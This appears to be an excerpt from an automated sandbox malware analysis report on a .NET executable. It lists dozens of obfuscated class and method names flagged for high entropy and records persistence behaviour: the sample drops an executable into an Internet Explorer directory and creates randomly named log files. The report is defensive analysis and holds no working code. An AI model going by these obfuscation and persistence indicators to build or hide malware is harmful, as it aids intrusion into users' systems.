                            Source: KPFv8ATDx0.exe, XiChbBkFNZi0h39Na2N.csHigh entropy of concatenated method names: 'JlrkB68nRS', 'rntkGwb28n', 'ciTkzlQBCS', 'wZicOH8bTeCDBfSUjRJJ', 'jUjnBj8bxuiyXkvOPCuB', 'TGmsxv8bc7PngYKBru7N', 'fJQpdE8bydScNO780C0d', 'nygQJEhEVi', 'clBAhX8bS2wyTtJXXTI2', 'Vp3s228bwNnYaQd7QGHv'
                            Source: KPFv8ATDx0.exe, vcc6fJY3LJDZVnGobNh.csHigh entropy of concatenated method names: 'c1bYOZQSuR', 'HmvYfgl1Os', 'CdLYH4JpGu', 'yR8y1x8dWFlnIe1GdGEd', 'n0Wqq38do5taIZA8gept', 'LZVvKI8dJoh1SYiUBZnM', 'HTUg1k8d5xIKkdsDBwtF', 'MRRbJm8dLZtZEogVscnf', 'U2Snl98djCDFJKpWr7Mf', 'HTc17W8dRu7cywOcsDtL'
                            Source: KPFv8ATDx0.exe, ntI6kY2Wkltvoh6i3Oh.csHigh entropy of concatenated method names: 'FSp85J8TejBK470ILksF', 'krjSZX8T3TJ22ZrNQW4Y', 'e8SscI8Tas6aoicHdnPY', 'g5g4Fm8TvVf8HigPvSHG', '_7kT', '_376', 'rQa2Lsixvu', 'hAO2jTGDKa', '_4p5', 'z9i2RTywhZ'
                            Source: KPFv8ATDx0.exe, tSNxUVe3Rfn63TswJ6J.csHigh entropy of concatenated method names: 'pX7eOc7K8k', 'PwBefdY3tp', 'rtWeH4hDdN', 'ufqdwc8xAF3546WCiBQ5', 'LXIk5F8xHslvyBYryLO4', 'HTFTQE8xrYamMyHXrr52', 'qgOo4X8xlJSFH7auv7GE', 'LI57VV8xptVGhL6KswyF', 'f9tH3o8xn5yo6QjcXVQN'
                            Source: KPFv8ATDx0.exe, lGHP5n8VfbXyx8AgW8o.csHigh entropy of concatenated method names: 'io8', 'V29', 'j67', '_2Q4', 'pi9', 'uO88LraKMXX', 'HYV8QNu2X0d', 'JIWhpc8Ybhk8VawGRF4O', 'UbpfSh8YE8OGwwPUByo7', 'H6Hy5f8YMq2fnlrP2msY'
                            Source: KPFv8ATDx0.exe, oMpCOIEQAifpCCOBhYw.csHigh entropy of concatenated method names: 'PL1EJLgAdg', 'GBDEWSymAJ', '_7Bm', 'QpEE5VU5rN', 'ngpEL50QFo', 'uudEj4AjXs', 'VwIER7CnYb', 'qdgWTX86mBLUtTHsNsEf', 'V1nMeV86DQpcaM8Nkgif', 'MyqGMG86sa9UaiWwY5tY'
                            Source: KPFv8ATDx0.exe, aWgwSHMIB46ejQ2KeF1.csHigh entropy of concatenated method names: '_57l', '_9m5', 't8K', 'k49', 'p65', '_3B1', '_4Pp', '_3M7', '_7b3', 'fAL'
                            Source: KPFv8ATDx0.exe, y4ooFBjINDNRpMSlHvM.csHigh entropy of concatenated method names: '_71a', 'd65', 'TOV8o2WXPEM', 'rh38oa4BDKb', 'rGV8LtIcD8x', 'haZ8o7M0Dn2', 'webJHp8mGhnHdNjvDCXE', 'KrGHWN8mzCkQZGUcpUfi', 't0Mi0Y8c7R4NFREeGaVk', 'WVAlXN8c8ZypWAqPho3A'
                            Source: KPFv8ATDx0.exe, OC6scL3rloEOLsRc9QJ.csHigh entropy of concatenated method names: 'Cj1', '_1Td', 'Cz6', 'ht3', 'PE33lTkAv9', '_947', 'c2Y3pjxcJ5', 'y6R3nQSGCf', '_1f8', '_71D'
                            Source: KPFv8ATDx0.exe, dFePp1qvu40XCYn1G0V.csHigh entropy of concatenated method names: 'TYJ8Wy3NdMv', 'Qlr8WTwonQA', 'CiV8WxsVBv0', 'tmonAT89ci58vaerVvvu', 'H32YtI89sJ0aO0edlhmJ', 'sCtcXO89mHrUf9sPiRIm', 'JYM8LdoEiK3', 'Qlr8WTwonQA', 'SYOMQB89ud2QYiRVqu1u', 'PQMKiQ89Tmujh4xln0Cl'
                            Source: KPFv8ATDx0.exe, MKgg8WBppGDcZJ5aAKS.csHigh entropy of concatenated method names: 'Cb4BDCFLuR', 'S2pBshOM1L', 'sicBmBugWv', 'mYnBcHiftO', 'qeQByk7mxI', 'HPbBThX1rX', 'JnCBxaKUCO', 'JYaBukSAQS', 'bLKBSbiIKO', 'mIkBw6LTZn'
                            Source: KPFv8ATDx0.exe, Va3hUK9lmuW7m1ZiFxJ.csHigh entropy of concatenated method names: 'suQuq08BbwWJ0S6DJEFp', 'TaL4QA8BEqH1j4COgwlh', 'X4CCCN8WcL', 'l7S3AU8BsyXY4mrZf0Js', 'OPh3n08BmJTeEa6ttgQD', 'EE65En8BcHuAJXcBV5uB', 'OmAw2F8ByiS2m5ChFJmd', 'tVfGc88BTKv13tecHB3B', 'QQTcMy8BxG2gREjDTuQE', 'Nj30Ws8BuAHd7WGF574Y'
                            Source: KPFv8ATDx0.exe, au3TwNBFCrkjZ8rUsLP.csHigh entropy of concatenated method names: 'Q5n8W6cAj3o', 'xKi8WKsLJuI', 'BqA8WNJi43M', 'FpG8Wi9S2Jf', 'Xlq8Wq74sKq', 'eWI8W0wBKYe', 'RrY8WglntkV', 'lifGjJmlW0', 'SiN8WVuiPg5', 'Wj58W9MVn84'
                            Source: KPFv8ATDx0.exe, m7DDVC5ZipWwUIOS3eH.csHigh entropy of concatenated method names: 'Ar45E7Sh3R', 'bumfVO8svf6lSKcwWqxy', 'wwWFMy8seZvCINn6U99b', 'EkUq278s2hRESCNPZ4kl', 'd1LjQ38sa4XvD9lJy5lU', 'qBW5dF8s3IaULHapMlGd', 'RjB5PylCdh', 'oer6KM8sJZh2BsZl4ycD', 'SVH08l8sWWje9Y7ywRi8', 'vrw7VL8s51oJGPmUlapy'
                            Source: KPFv8ATDx0.exe, XWe7aj3GwRsWLIKLlrP.csHigh entropy of concatenated method names: 'XChX7nW9ZV', 'dvMX8IAPU8', 'R8vXkf1p6h', 'wPVXQnsd30', 'UrIXoVZPcJ', 'wRkr2K8uo2YAahmFlpPs', 'ArniVC8ukjS1d1m92bQy', 'hGDUGB8uQf7sfVppsL7g', 'RUut1a8uJDDEXQN1D6y3', 'KwkmUJ8uWFmPAjQUhyAv'
                            Source: KPFv8ATDx0.exe, BnQoqK8eYQgevDdeKWR.csHigh entropy of concatenated method names: 'C8J8X9SR3j', 'kkJ8OYVntm', 'gjc8fYgbAi', 'ddLdw78IuCJMBOa94wBj', 'mtZ4cJ8ISWxlRmgwTuZM', 'C4Dyxx8IwEALTXulXrAU', 'TSbvZ58IFQhAbTxRawXE', 's3FEgp8IhndByQK8hxAo', 'B6nj868IUra1ptT72GT0'
                            Source: KPFv8ATDx0.exe, YueMjsvF2VNRTUIt91f.csHigh entropy of concatenated method names: 'GSvvUmgqc4', 'DmKvdEtfQ3', 'HGAv6IaCES', 'qiRvKekkqK', 'Q1gvNXdA1t', 'VTb9Eg8x84yJ6yaDTC9M', 'G4V9Js8TzjtDURjW1B6L', 'vmrhFu8x7GFyiIq6vwnB', 'PkdxTr8xkOmUlY2Y953I', 'mK2im48xQ8fpHVJmnwH7'
                            Source: KPFv8ATDx0.exe, Vcu9ZxM7EdDML0GwNLV.csHigh entropy of concatenated method names: 'a4Q', '_6h5', '_4fY', '_32D', 'j7E', 'Lr9', '_7ik', '_9X3', 'g6m', '_633'
                            Source: KPFv8ATDx0.exe, waiVlCe1heGPc2YfGZN.csHigh entropy of concatenated method names: 'j9l', 'kCDesiFMX3', 'FACem7MYy6', 'sAYec9OCnG', 'DMseyb2OQR', 'jGLeTL50TZ', 'C9vexN0Xd3', 'QL9Ql98x4EeHwQDrx2PA', 'fKt6GA8xPx3GuDW3pnLv', 'LuPdXj8xtKYFK31D5EMn'
                            Source: KPFv8ATDx0.exe, zckR7IQRaH3UcofIOWB.csHigh entropy of concatenated method names: 'q8AQaadFHN', 'hERQvfsWF5', 'YJVQe8g3JM', 'gFnvbc8b0U1PsFCLcJa2', 'jjRn7d8bgSrhedmkNDH6', 'LfOy6i8bid6wk99GKpxN', 'KNFoh58bqTDqnX9MPehB', 'GQOC9l8bVJZyDqd56HbW'
                            Source: KPFv8ATDx0.exe, urOr9wRXIl79n99Lf7M.csHigh entropy of concatenated method names: '_5t1', 'd65', 'zKL8ot5W7l2', 'klW8oIaBBx8', 'WJKRfduppZ', 'Ymc8LD5gbfg', 'haZ8o7M0Dn2', 'O01yUP8cCsR9MIPmdBy5', 'juGhPS8cBhjhSW51gSvN', 'j4suYC8cG2Elnr78oyB8'
                            Source: KPFv8ATDx0.exe, V3xWCjQgblXQS2y7REh.csHigh entropy of concatenated method names: 'Mb6Q9Z7dt1', 'EtZcTZ8EDvHhEgUHMmVI', 'q6nk2e8EshFr0tqdWqTE', 'FYJ56Z8EmlLlS5aLoWHo', 'yuj9xn8Ecc8pO2SDBg3a', 'jsuFEy8Eyiy2t1P9H6Ww', 'LtZGdR8EMtesTXVCJoGn', 'Ltd6Ze8E1J8T3PWhSfTW', 'vwepGK8ETWZ9Y6TiXkt3'
                            Source: KPFv8ATDx0.exe, hH260Jjg4ZLqOWr8o2S.csHigh entropy of concatenated method names: '_46E', 'd65', 'WdIj9h5fKU', 'wDN8LEEe50g', 'haZ8o7M0Dn2', 'u5GjCYyf6F', 'H0HS1g8cbuSNBhpcHVQq', 'lXaFqR8cE896BZI4LcOq', 'aN11UX8cIFmaBcA5JdGU', 'BdPVr68cYkSyeBhE8jFH'
                            Source: KPFv8ATDx0.exe, UHlJGPRTxBxX2KntEBd.csHigh entropy of concatenated method names: '_2SY', 'fiM8Lc6Zo8a', 'qeWRuMablp', 'jau8LyndJ2J', 'dkAIC48yn4rFrEWSWrRZ', 'YXJL3W8yZPoYk13EpZGx', 'VRJARl8ylREjj6bXJ9ch', 'k7dg7g8ypb6ocqWZ6pYr', 'zPNZWV8y4jgmapEH4rXE', 'mmXk2q8yP8DHmbco51gw'
                            Source: KPFv8ATDx0.exe, oB5B4TjeU4mX3FuNASZ.csHigh entropy of concatenated method names: '_54f', 'd65', 'pxN8ooCMtvT', 'LNw8oJjWgnP', 'Su98LZ7DDPF', 'haZ8o7M0Dn2', 'DfGCVo8mwdv70GpyhsTs', 'KJPAoI8mFOGUKqjLOiFO', 'bETtnA8mugMmxD2q3v1O', 'CO5pwa8mSOdvs8sPPAj5'
                            Source: KPFv8ATDx0.exe, hacsVneqtQfLIEe083a.csHigh entropy of concatenated method names: 'mtYegGjC2V', 'xK8eVgVnXV', 'UVie97vm4l', 'i6MeCd0vGp', 'sRkeBrPEaU', 'HEoXTs8xTwndoOterKk8', 'dwZVPC8xccE9VO8oEc0C', 'NGAVI48xyO5oToItYlbT', 'eGHhaE8xxERaMf7FQMJj', 'ecfgOx8xuJKSvWVGgDID'
                            Source: KPFv8ATDx0.exe, AU3p9HjMqNZLaSojVXb.csHigh entropy of concatenated method names: 'EjEju3jA8B', 'BtCWj58cvpTVfVcAKEU9', 'U2XFcN8c2w24TBTjSbPJ', 'MPt5NJ8ca16dWR2hKN7U', 'yO5aBB8ce3dOuQyBZvDm', 'rdVimC8c3yFKrtEHav8C', 'UU8', 'd65', 'oeD8oeBBx7l', 'vJj8o3CEbxx'
                            Source: KPFv8ATDx0.exe, KlPQc4NiWcrnuD72veP.csHigh entropy of concatenated method names: 'Uq28LUqvApf', 'J4sN0UWF5X', 'UcXNgDp1pn', 'sLyNVPWOJZ', 'UyU7Q28gMZKtHxoU4IGW', 'nCwAVn8g1e7um34HuiAb', 'mFiCWg8gDmFME4ZSVNWj', 'QgIi3U8gsafWRlM3wh8S', 'Cn5Rd88gmTjUjC8f2EiB', 'X5CCuL8gcFXXr99ehpqr'
                            Source: KPFv8ATDx0.exe, AaUV6XR9pqQVAhMZLfA.csHigh entropy of concatenated method names: 'My5', 'V4X', 'zT6', 'GEmRB2Pipr', 'WXJ8LSEGy2I', 'OfWRGTWsam', 'Ey48LwPrjWK', 'bOtZSH8yUv1GaOgxbD1F', 'mdIMEH8yF33By3LmE7no', 'yVMJsK8yhl8JZxp5Vwj1'
                            Source: KPFv8ATDx0.exe, TfH1Ko8uvcockfaLHXs.csHigh entropy of concatenated method names: 'n39', 'V29', '_4yb', '_2Q4', 'p93', 'Fyn8Lfgn9vE', 'HYV8QNu2X0d', 'T9iofv8YvM0UxrrhLwNl', 'Bre5EQ8Yec5c7bROSLaC', 'KYR48p8Y3tSGqr5EnIah'
                            Source: KPFv8ATDx0.exe, yf8CIEN914nI1E2Jo0H.csHigh entropy of concatenated method names: 'VV2ian19fU', 'LNvTQf8V26wFHokKAjox', 'eScd8P8VaXv93MAmRZty', 'o9LgZh8VjWOfVmOl5xyA', 'YuLhpx8VRhA0FGQtnZWT', 'OvnqcJ8Vva1BQvYhHdUy', 'CPX', 'h7V', 'G6s', '_2r8'
                            Source: KPFv8ATDx0.exe, Gx1wos8tjqSlRgZbKyL.csHigh entropy of concatenated method names: 'N2T', 'V29', 'o75', '_2Q4', 'K3B', 'C9O8LXvFNyj', 'HYV8QNu2X0d', 'xaBtOX8ICgicbwCOhWca', 'EZGj8M8IBZYJuEkHBMah', 'iYA6Vq8IG9Uof37S3oOC'
                            Source: KPFv8ATDx0.exe, BdZ1XGfPrhYGRtcgpq0.csHigh entropy of concatenated method names: 'vNq', 'O3Q', 'a43', 'V8g', 'g39', '_9By', 'h74', 'fl2', '_4L8', '_8e1'
                            Source: KPFv8ATDx0.exe, pbO0rJ0GoMokAumWJLQ.csHigh entropy of concatenated method names: 'cN7gk73voZ', 'aD2gQICG3H', 'XG6aKG8CuA86M7aN1Oa2', 'OtDuNy8CSHyTGxq4GrkU', 'sR7Vrt8CTZ2eZqpa1J5m', 'yxPkkk8CxbuKKw24L0xy', 'lmZiWi8CwUJJtx6HfSVe', 'T1n77Y8CFr35fWApev2c', 'GRMg7TjZTy', 'QuLa1Z8Cscmny9SuFu24'
                            Source: KPFv8ATDx0.exe, QjvayQnc8clBucmyug0.csHigh entropy of concatenated method names: 'yCZIPB3fui', 'wdSIt03Rdi', 'bueYpi8UtBpysoUQD6ur', 'Qwxq098U40jiflIsaojw', 'vcZO2i8UPJBUCcMKr8Gy', 'MXaDX48UILhCUpC1pc4O', 'sEus7Q8UYbNcITlYgE0W', 'VdQI1ILR7O', 'oNiCFC8U1vrbUY5q301m', 'CiQkrf8UEcotpvtiXvEc'
                            Source: KPFv8ATDx0.exe, ksUQbpf0vyemOAjIain.csHigh entropy of concatenated method names: 'CJnLcL8F1n9jEayeebxJ', 'tr3H8s8FEDUF0D3Z5p92', 'zgxlbE8FMT5FK4bFkgUJ', 'qDwljy8FDIPCRtEPAkl3', 'SlTnPRUOPI', 'GAj01h8Fy7J5Q2qDMSCq', 'UrXv8h8Fmn5b6IfOhqyH', 'nMn6eu8FcK8ujODiwJD2', 'IO8WbZ8FTrCR6NiUBW6k', 's25nY8aMSB'
                            Source: KPFv8ATDx0.exe, Dtwlj4qomTx27PXK8CA.csHigh entropy of concatenated method names: 'iEXqW8ramb', 'DPmq5yRoDc', 'vIgqLiWdIN', 'VqSqjXoid4', '_0023Nn', 'Dispose', 'Olak6R8VGfC3OJILQ8mw', 'dM5fMJ8VCqIXyErfe9Vx', 'D2EuXT8VBjG5lDbPgOuM', 'juf4558VzpyhqQ60bYbN'
                            Source: KPFv8ATDx0.exe, ydyjq4f2MLptKLot30.csHigh entropy of concatenated method names: 'IWwsNXAHd', 'TG6o6Q8tgdv2MWWlyk04', 'Daig458tVPcP9f0Nom7Q', 'u4kFMH8tqiUdEg7hgsm8', 'QUaFm08t0COJeeKUjo72', 'zMtrFucpm', 'vSkAhwkty', 'ftLlRiklH', 'fL0pyb07u', 'N1hnRdBwd'
                            Source: KPFv8ATDx0.exe, AvK8mmM10VP6TUeVxef.csHigh entropy of concatenated method names: 'bSwMstOMq3', 'TWUMmukY2s', 'w7MMc1deby', 'Y34', '_716', 'p32', 'Na8', 'X25', 'pT1', 'OQgMyGjSD4'
                            Source: KPFv8ATDx0.exe, FcrnmK2phl1nCQ9RXYk.csHigh entropy of concatenated method names: 'y2L2ZlrRsT', 'Ebd24qlpuv', 'zBD2PYQZoh', 'DGcpxM8THFfcGtUEsWBH', 'jaKl5D8TOwYiqRdY0nmF', 'tOIOwp8TfHR4DwDOOsGo', 'toOXFn8TrZW1GSyt6UQV', 'sJYU128TAJ3vAtlruSG0'
                            Source: KPFv8ATDx0.exe, IgUNxjou4p59yZTfc9M.csHigh entropy of concatenated method names: 'NgEoKbRfML', 'yqIAB68MSDWMqIotQgik', 'Wdbj0T8MxIJXYMIYRZVK', 'hiMQtq8MuXMIr88B3a2B', 'jf2yjO8MwKisIAmgGWio', 'kBiow9i38U', 'yE4oF6t22n', 'zBoohSHTWJ', 'kwGl6U8MmXSQuvs22Q8p', 'hwLNpT8McYAraJ0X18dI'
                            Source: KPFv8ATDx0.exe, JZFjYHRjSkepnPpqOSC.csHigh entropy of concatenated method names: 'NxvReisbli', 'Ggwtr28cgqn7XIwabmxy', 'Ig6E6T8cqVt55jJ1rCS9', 'O29dUU8c04AGFHio2D2F', 'g5eVrR8cVsrUE9HBpYae', '_53Y', 'd65', 'LrO8oZHqH7K', 'YhC8o42o1Ee', 'p2d8L15dn3B'
                            Source: KPFv8ATDx0.exe, xF4cXUL6LuiuN2oYOZG.csHigh entropy of concatenated method names: 'fHYLgt0i1D', 'Ps4LVuf6fa', 'dojL9swgMd', 'qYALC7bJjj', 'VgxLBRV6gp', 'W7SLGVqgcn', 'ivgLzRnYtj', 'D0ZwwO8mtD9GFMZdrocH', 'zReRx98mI2IZHKXgQeKp', 'nNB35n8m4TsxH08menEU'
                            Source: KPFv8ATDx0.exe, xUOAM3W5UY5NC8ZpWcc.csHigh entropy of concatenated method names: 'iMfWAdnhe5', 'VZZWls4L3m', 'PnjZWW8DWLM9lWFnAh6c', 'KR158H8D5lQuYC2mgE1K', 'PPR9kI8DovHwtQKm8qiN', 'w00GnE8DJncvQLXiYgpV', 'KQlWfueoJg', 'fjOWHmAKZX', 'L0s4IE8D86jRwejH8kBT', 'kd1KMF81zyqnYZGO87MJ'
                            Source: KPFv8ATDx0.exe, i6CMIFMVPx87KMXPZoQ.csHigh entropy of concatenated method names: '_2JN', 'A67', '_49I', 'G7qMCVfIK6', 'UGlMBFqnND', 'vtSMGyMowq', 'WZ7MzLXx54', 'Fj1172yKuX', 'DXm18qQ57o', 'HrcVRs8NX4w8Sg6trBdT'
                            Source: KPFv8ATDx0.exe, A9QEVwiMEOo8ByJ87kX.csHigh entropy of concatenated method names: 'kvRisxAD9s', 'ogciT5DdQY', 'vv9iSKBBuR', 'HyPiwWwNEV', 'yq8iFl2RO7', 'zmfihcWuM3', 'YWRiUVsfsC', 'r08idXd9ck', '_0023Nn', 'Dispose'
                            Source: KPFv8ATDx0.exe, oQdZrmkLTeYpJ5GIPCy.csHigh entropy of concatenated method names: 'lLwkRNNruc', 'GQNk2nPyqB', 'Rg9kagjKcY', 'HjwqZb8Y6AVAZx0gkJ6r', 'dXJDnO8YUdTX95IDYewl', 'ldEQ1h8YdlWJXx2ggYeS', 'QmXyZi8YKvSYDMw37jTZ', 'OBlCOQ8YNXElNklaGQcM', 'GpbBRH8Yi9Tco6WeFeOQ', 'YQyvKV8YqwqBLgbYpfMA'
                            Source: KPFv8ATDx0.exe, fgESji5gu7eaqdycUGT.csHigh entropy of concatenated method names: '_5Z7', '_58k', '_4x4', 'bU6', '_3t4', 'a5C', 'e2UL4J8scGQMi8IxRAnV', 'Nl4ojr8syAO6O9qXYNKf', 'efCCfi8sTvhFgRdbyHnL', 'Pucdxk8sx3Q1BnoW3fUI'
                            Source: KPFv8ATDx0.exe, uKrw7TzGZlCDOX8yQd.csHigh entropy of concatenated method names: 'gmJ880uC1K', 'JGA8Q5KAxG', 'gdN8ovulkE', 'iZr8JssKqU', 'Av18WQSdwS', 'ruf85yFnyY', 'HGX8jIhB9k', 'bTKqga8IEAfRiPBHY1Xp', 'eQBkrA8IMe8Ww0fXPRiO', 'PGDvgW8I1voljLEW4igA'
                            Source: KPFv8ATDx0.exe, SSGXnbJddqhOxVxRJZs.csHigh entropy of concatenated method names: 'oJbJCv9b8h', 'n3tJBwmr4i', 'amRyya81TDY3YRIjjctV', 'Mkfe5L81x73YiPyRZvIl', 'RdwxAP81udmpIRxUxQw8', 'uUoW8x6lFK', 'esKek681h9b4Wnllc6yk', 'O6PUX681UOF4tTt4GEiV', 'mh5mGI81wlODBPQLffxH', 'psNYPr81FxuOk44yYgGB'
                            Source: KPFv8ATDx0.exe, ng2WsREycwwTCm9TvdY.csHigh entropy of concatenated method names: 'HwIExBqaIQ', 'gsbEuskLI4', 'rlgESRm9ZF', 'EmBEwaUOsJ', 'QLVEFB1Mop', 'QrLswL8KrtdHTBQjkwcQ', 'EkEBly8KAG0Zwxet35rw', 'RiW80J8KlsGvdHRJVt38', 'onEY6M8Kf0ydYQmUbgcu', 'TkHFph8KHBauyX1n8VhH'
                            Source: KPFv8ATDx0.exe, P6hsB3fk3tZj6FTDwRk.csHigh entropy of concatenated method names: 'tVUffSuYqY', 'UHJfr4rd3F', 'qfBfoxu0uY', 's55fJsEk9R', 'djYfWm2Fhl', 'KW9f5FkgVc', 'X4WfLdqfIl', 'osWfj1xBci', 'mMIfRHSidF', 'nnef2xHDS1'
                            Source: KPFv8ATDx0.exe, kaPOj0YANOWt0u7wfXL.csHigh entropy of concatenated method names: 'A4QYpFaIKo', 'BELYnaITWY', 'GD8YZPdcLu', 'DXeY4m3Lsl', 'r1fYPUqb3P', 'LUJYtFv2Xe', 'X2bmGs8deKxCwgjdKBpt', 'wpuCkA8da4cFaad9xFHa', 'xTSg3l8dvdu74hgf3ci7', 'XfwMpJ8d3v0nq1MCfjfq'
                            Source: KPFv8ATDx0.exe, NeVwjuJvWeamqFe7vOn.csHigh entropy of concatenated method names: 'Wc7', 'k7S', '_37r', 'MJy8LleORCJ', 'Dob8Qz3fdG5', 'Pi5ma581WapQoLRxIkDA', 'oDLnNr815swYc1CJk7qO', 'vN1pBs81Lo5uxU9lvyKt', 'ouB3yb81jDk0d7vELN5x', 'DT7GUq81RxssDO5LLhcd'
                            Source: KPFv8ATDx0.exe, cQGoWgom0qS39jusISu.csHigh entropy of concatenated method names: 'roEoygFHeD', 'l0OoTghSXd', 'RhhoSv8MP5540esA1f1V', 'PA2Anj8MtEDdi306Ggit', 'iYit2C8MI8rFnVWeTw7S', 'Wq6Z1T8MY8Lt0EuwSR9N', 'iBvWdk8MbRptwXdUbJ80', 'UgC9qZ8MECsIRF55ttoE', 'Sgm2oK8MMkRCuqbCqrhO'
                            Source: KPFv8ATDx0.exe, vKg5MRmLpiCyxCSJ5NU.csHigh entropy of concatenated method names: 'mA2mRn3DvK', '_64r', '_69F', '_478', 'VFsm24RSiJ', '_4D8', 'PVVmaCXBn6', 'fHHmvdJ9rg', '_4qr', 'KnDme7XbQM'
                            Source: KPFv8ATDx0.exe, A0wL9H2EHeMqV0cpjQj.csHigh entropy of concatenated method names: 'JmsvrVHJEs', 'v8WZ9o8TFltD1TdF2Qa5', 'pL88yE8TSdHjHfE9dk78', 'z2KZeH8TwnhZSc4D5G8I', 'mlXApd8ThnDjcyaVPrGS', 'mn921oAGjP', 'Xvc2D5BPJN', 'RPB2sgxZXJ', 'U662mO2M6K', 'g2G2cygrAu'
                            Source: KPFv8ATDx0.exe, Vu858OoPCdR6uE5kBD2.csHigh entropy of concatenated method names: 'paAoImdfJL', 'uPQoYrI75j', 'Lnmob3YMnu', 'MIfoEY1k9l', 'wBVgMB8MHTk9y0TlCIvy', 'jq4WxW8MOXjLAQv8djV2', 'EI8NRf8MfVmVjBfOQ2BJ', 'QSLGfS8MrZXOr3yAkuuv', 'vRBDYg8MArpAwh0U70ja', 'uaBs8s8MlRrNy0TNuk8q'
                            Source: KPFv8ATDx0.exe, jon78CySEd8BUyn6cdh.csHigh entropy of concatenated method names: 'ubayFXU0bb', 'Oe1yhwWhya', 'xwiyURXbFM', 'xtmydjBULo', 'i2ay6jjF8p', 'B2SyKa6Abh', 'I0KyNyHkqH', 'f3fyiCbGty', 'BVJyq8s7Do', 'm2Yy0WYwob'
                            Source: KPFv8ATDx0.exe, FodCUNoi9myhFdrRt5B.csHigh entropy of concatenated method names: 'KUboBYDoG7', 'zCBoGqWXfQ', 'sw2ozV6Ons', 'm8FXhj8Mqb40tYUN1a9T', 'gTvA0K8M076Wrf9mlbx1', 'le7i9e8MNHijPyIhuHAP', 'VJB1EX8MiEDJgM3PQtwW', 'OBuo0EFGkK', 'anmog0qNZB', 'GgToVfs3aN'
                            Source: KPFv8ATDx0.exe, m4y1wG86KV2QuhjMGHy.csHigh entropy of concatenated method names: '_413', 'V29', '_351', '_2Q4', 'H7R', 'LvF8LHiMnFB', 'HYV8QNu2X0d', 'jTyi5l8Ylo24j7sS1HJN', 'B90XB48Yp8ZUEVn2hTdc', 'mwtsZr8YnXmFBy9cYiXx'
                            Source: KPFv8ATDx0.exe, dXqTmuTADxBS0Bxx4FB.csHigh entropy of concatenated method names: 'FnMDhA80MNqFjX1MxQYd', 'bpBFTY8011gty1mEW2d0', 'h9Wrlc80bfo6t2ZTl6q5', 's7R8Ih80EQZYVsK76fD6', 'TMSC8280tUKQM0ISBVgl', 'vOZRwu80IdAUPUCTcrDQ', 'xDcLdD804UFMJQDHe4YS', 'S15P6h80PkRD897TRYd7'
                            Source: KPFv8ATDx0.exe, uj6o1kWhVCZN8dKwEHC.csHigh entropy of concatenated method names: 'Cy157yIsST', 'rq658RoSO4', 'x5x5k4MAsi', 'nZ6hDo8DdN76cpnfxssb', 'oI8M1T8DhkfWIZitc6Sm', 'mfB9bQ8DUTNUiMTKbURc', 'xTqBOT8D6V4jn4GcDsIO', 'N32WdRCuIo', 'ySnW6KhFrP', 'VruWK8RKGj'
                            Source: KPFv8ATDx0.exe, CCdAbmblkSdwB11ane9.csHigh entropy of concatenated method names: 'axPbneEMFE', 'lBmbZysWPh', 'M62', '_1Xu', 'LuR', '_4p3', 'HVh', 'jYSb4TPjhS', '_96S', '_9s5'
                            Source: KPFv8ATDx0.exe, JwMsoQjzaVVxKuDi6v4.csHigh entropy of concatenated method names: 'dOeRWRFp4e', 'tTb8qo8cwWDJVqpaVOP1', 'BgInU38cuvpJKSsaFgME', 'tIbW7b8cSgTgbS29FN6b', 'gQvC5T8cFtZDlwHLsYXI', 'eq7', 'd65', 'pjW8olIY055', 'KlS8opjesJZ', 'vf58LMkip1b'
                            Source: KPFv8ATDx0.exe, g7oEDkyHXDtmGV99cVS.csHigh entropy of concatenated method names: 'PJWyADiK94', 'M3TylDf90Q', 'iDNypKkEIj', 'UrhynsBG8b', 'VpHyZbAWCG', 'F4ly4twgxV', 'WjZyPFJZdD', 'uH1ytm6pge', 'igeyI4Yy4T', 'rePyYQna4c'
                            Source: KPFv8ATDx0.exe, jdfW43kEn3IE05gMjOX.csHigh entropy of concatenated method names: 'wHCkuivVqX', 'TRLb628bO62XTApQpC3W', 'kgGGsA8bfVa7j57lPbnW', 'gsTZo78b3GLsh1aK2wq2', 'Iw5qmB8bXT6ppU1lpRrU', 'Hgugh68bHG0mYwvU9xqp', 'q6SDFT8brZtdpU5cyha6', 'RpDk1b8tRa', 'EmkkDUJO4T', 'saqksOZplp'
                            Source: KPFv8ATDx0.exe, evFcw7iPjurXsYXsdVb.csHigh entropy of concatenated method names: 'Xyb', 'Sz4', 'zej', 'zBRiIc7q8P', 'wgZ4JG8VYknvZjxHTT8C', 'OwmRJE8VbeuFnBEF93iJ', 'b5QJwO8VEaMxGTUNFV0X', 'evaBBt8VMGk3clcepl0b', 'sgqQeD8V1nULA33covl1', 'LZbjy68VDkOBoyLaiWmM'
                            Source: KPFv8ATDx0.exe, W9a02ljFvX7mOK6h6S8.csHigh entropy of concatenated method names: 'IDV', 'd65', 'IaT8LY7krLv', 'haZ8o7M0Dn2', 'Ns6jUDqgYE', 'LBE44N8cOIPvEFs1F6nu', 'xmP8NQ8cftZPQYietPqV', 'kYqy258cHENUw4VmcbcS', 'I5JeUu8crkpJpy0ljhlv', 'gnlFJr8cAMMIgcRnw4oN'
                            Source: KPFv8ATDx0.exe, b60krnOnsiunUE8kjPe.csHigh entropy of concatenated method names: 'PHSOUBULJU', 'N2iO4YBnlV', 'DfGOPZNusB', 'o0eOtiZrtW', 'arLOI5i17T', 'D8HOYZ0I2m', 'h42ObY0GDp', 'QxiOEmMyZI', 'Lc5OM8Wn1P', 'CteO1Wb4N9'
                            Source: KPFv8ATDx0.exe, Cis4wrs6uTatZ3iBFxJ.csHigh entropy of concatenated method names: '_25r', 'h65', 'cDusNncENK', 'lWqsiuKlVU', 'ygbsqVTB1J', 'AWD', 'd78', 'A6v', 'dqG', 'M96'

                            Persistence and Installation Behavior

                            barindex
                            Drops executable to a common third party application directory
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeFile written: C:\Program Files\Internet Explorer\en-GB\oqWNZWQNWoNnROlqjKcKhLM.exeJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\LljRCdQC.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\AWvLLWqc.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\tCqOXkyz.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\YHFyVwyQ.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\VggGSNtC.logJump to dropped file
